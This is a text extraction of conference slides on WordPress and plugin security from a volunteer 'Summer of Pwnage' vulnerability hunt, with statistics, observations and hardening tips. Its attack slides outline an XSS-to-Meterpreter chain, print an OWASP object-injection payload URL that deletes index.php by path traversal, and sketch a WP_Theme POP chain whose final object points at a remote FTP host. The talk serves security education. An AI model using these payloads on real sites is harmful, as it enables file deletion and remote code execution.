the state of security of wordpress (plugins) › download › the state of security of...summer of...
TRANSCRIPT
![Page 1: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/1.jpg)
YorickKoster
![Page 2: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/2.jpg)
Contents
• AboutMe• SummerofPwnage• StateofSecurity• Pwning WordPress
![Page 3: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/3.jpg)
AboutMe
• YorickKoster• Co-FounderSecurifyProactiveSoftwareSecurity/BuildSecurityIn
• ~15yearsdoingsoftwaresecurity• Uncoveredvulnerabilitiesinvariousproducts– InternetExplorer,Office,.NETFramework,AdobeReader,WordPress &more.
![Page 4: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/4.jpg)
SummerofPwnage
![Page 5: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/5.jpg)
SummerofPwnage
• Startedasjoke• UsedGithub tofindObjectInjection
• Wedidn’tknowhowtorunacon(stilldon’t😉 )
![Page 6: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/6.jpg)
SummerofPwnage
• MonthofWordPresshacking• Meetupeveryweek• VMwithWordPress&~1000plugins/themes• Forstudents&peoplewlittleexperience• ~25-30activeparticipants• Resultedin118findings(5Core)
https://www.sumofpwn.nl/advisories.htmlhttps://twitter.com/sumofpwn
![Page 7: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/7.jpg)
SummerofPwnageResults
Cross-SiteScripting66%
Cross-SiteRequestForgery
12% PHPObjectInjection
8%
(Remote)CodeExecution4%
LocalFileInclusion3%
DenialofService3%
AuthenticationBypass2%
Misc
2%
Other14%
SummerofXSS😎
![Page 8: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/8.jpg)
SummerofPwnageResults
65%
23%
12%
CSRF Pre-auth Privilegeescalation
![Page 9: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/9.jpg)
SummerofPwnageResults
0
10
20
30
40
50
60
70
80
Fixed Open Nofix
![Page 10: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/10.jpg)
SummerofPwnageMediacoverage
42
![Page 11: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/11.jpg)
SummerofPwnageObservations• Focusonlowhangingfruit• Grepisking• Gettingstufffixedishard• Securityknowledgepluginswritersislow
![Page 12: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/12.jpg)
WordPress(Plugins)
StateofSecurity
![Page 13: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/13.jpg)
WordPress SecurityCore• WordPressisblogsoftwarewithCMSfeatures• Powers~27%ofallwebsites(reportedly)• Focusonwhocaneditwhichcontent– Contentiseitherpublishedornot*–Mediacanbeenumerated*
![Page 14: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/14.jpg)
WordPress SecurityCore• Seemslikethey’velearnedthehardway• Coreisrelativesecure(appeartoknowtheirstuff)– Filtering/validation– Anti-CSRF(nonces)– Automaticupdates🙂
• (Legacy)issues– Nopreparedstatements– SaltedMD5passwords– Loginbruteforce– NotdesignedforCSP
![Page 15: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/15.jpg)
WordPressSecurityPlugins• Vulnerabilitiesinonly~100pluginsof1000popularplugins(10%)
• Keepinmind:– Limited(spare)time– Focusonlowhangingfruit
![Page 16: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/16.jpg)
WordPressSecurityPlugins• SomeAPIsaresecurebydefault– Eg,preventSQLi
• Somearenot– Outputencoding– CSRFprotection
• HighnumberofXSS&CSRFissuesget_post( int|WP_Post|null $post = null, string $output = OBJECT, string $filter = 'raw' )Retrieves post data given a post ID or post object.
![Page 17: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/17.jpg)
function column_default($item, $column_name){
$item = apply_filters('ull-output-data', $item);//unset existing filter and pagination$args = wp_parse_args( parse_url($_SERVER["REQUEST_URI"], PHP_URL_QUERY) );unset($args['filter']);unset($args['paged']);switch($column_name){
case 'id':case 'uid':case 'time':
case 'data':return $item[$column_name];case 'image':
$user = new WP_User( $item['uid'] );$user_email = $user->user_email;return get_avatar( $user_email, 60 );
case 'user_email':return $item[$column_name];
case 'ip':return $item[$column_name];
![Page 18: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/18.jpg)
WordPressSecurityPlugins(XSS)
![Page 19: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/19.jpg)
WordPressSecurityPluginsWe'resorryfortheinconvenience,wewillfixthisrightaway.
Wewillneedtohaveaccesstoyourftpinformationsowecanloginandlookintothis,canyoupleaseprovideuswithlogincredentials?
IsthereareasonaWordPressnonceisn'tsufficientforthissecurityconcern?
Canyou atleast explainmethedamageitcouldcreate?
Canyouhelpmeunderstandwhyjson_encode/json_decode issuperiortousingserialize/unserialize?
[…]iscalledbyaWordpress add_menu_page,intheoryitisWordpress thathasfiltertheinputwhencallingthepage.
![Page 20: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/20.jpg)
WordPressSecuritySummary• WordPressCoreisrelativesecure• Corehasknown(legacy)issues• Lotsofinsecureplugins– DangerousAPIs– Lowsecurityawareness–MostlyXSS&CSRF
![Page 21: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/21.jpg)
Pwning WordPress
![Page 22: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/22.jpg)
Pwning WordPressCross-SiteScripting
![Page 23: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/23.jpg)
Pwning WordPressCross-SiteScripting
![Page 24: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/24.jpg)
Pwning WordPressCross-SiteScripting• InjectXSSpayload• Waitforadmintovisitvulnerablepage• Run2ndstageJavaScriptpayloadto:– modifyPHPfile;– visitPHPfile;– runPHPMeterpreterclient.
![Page 25: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/25.jpg)
Pwning WordPressCross-SiteScripting
![Page 26: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/26.jpg)
Pwning WordPressHardening• Ifyoudon’tneedtheeditor,disableit• Morehardening:
https://codex.wordpress.org/Hardening_WordPress
![Page 27: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/27.jpg)
Pwning WordPressPHPObjectInjection
![Page 28: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/28.jpg)
Pwning WordPressPHPObjectInjection
<?phpclass Example1 {public $cache_file;function __construct() {
// some PHP code...}
function __destruct() {$file = "/var/www/cache/tmp/{$this->cache_file}";if (file_exists($file)) @unlink($file);
}}
// some PHP code...$user_data = unserialize($_GET['data']);// some PHP code...?>
http://testsite.com/vuln.php?data=O:8:"Example1":1:{s:10:"cache_file";s:15:"../../index.php";}
OWASPexample
![Page 29: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/29.jpg)
Pwning WordPressPHPObjectInjection• Findtherighttarget• Direct:
– __destruct()– __wakeup()
• Indirect:– __toString()– __call()– __set()– __get()
• Autoloading:– spl_autoload_register()
![Page 30: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/30.jpg)
Pwning WordPressPHPObjectInjection• NoeasyexploitableclassinWordPress• FindthecorrectPOPchain• POPchainpresentedbySamThomas
http://www.slideshare.net/_s_n_t/php-unserialization-vulnerabilities-what-are-we-missing
• Attackstillworksinlatestversion(4.6.1)• UsesWP_Theme::__toString()asstartpoint
![Page 31: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/31.jpg)
Pwning WordPressPHPObjectInjection
WP_Theme __toString() display() load_textdomain() load_theme_textdomain()
i10n.phpload_textdomain()is_readable()ImportMOfile
![Page 32: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/32.jpg)
Pwning WordPressPHPObjectInjection
![Page 33: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/33.jpg)
Pwning WordPressPHPObjectInjection
![Page 34: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/34.jpg)
Pwning WordPressPHPObjectInjection
![Page 35: The State of Security of WordPress (plugins) › download › The State of Security of...Summer of Pwnage • Month of WordPress hacking • Meetup every week • VM with WordPress](https://reader034.vdocuments.net/reader034/viewer/2022042406/5f205e71245ae2263916bbc5/html5/thumbnails/35.jpg)
Pwning WordPressPHPObjectInjection• Finalobject
WP_Theme Object(
[theme_root:WP_Theme:private] => ftp://anonymous:[email protected][headers:WP_Theme:private] => Array
([Name] => foo[TextDomain] => default
)[stylesheet:WP_Theme:private] => foobar
)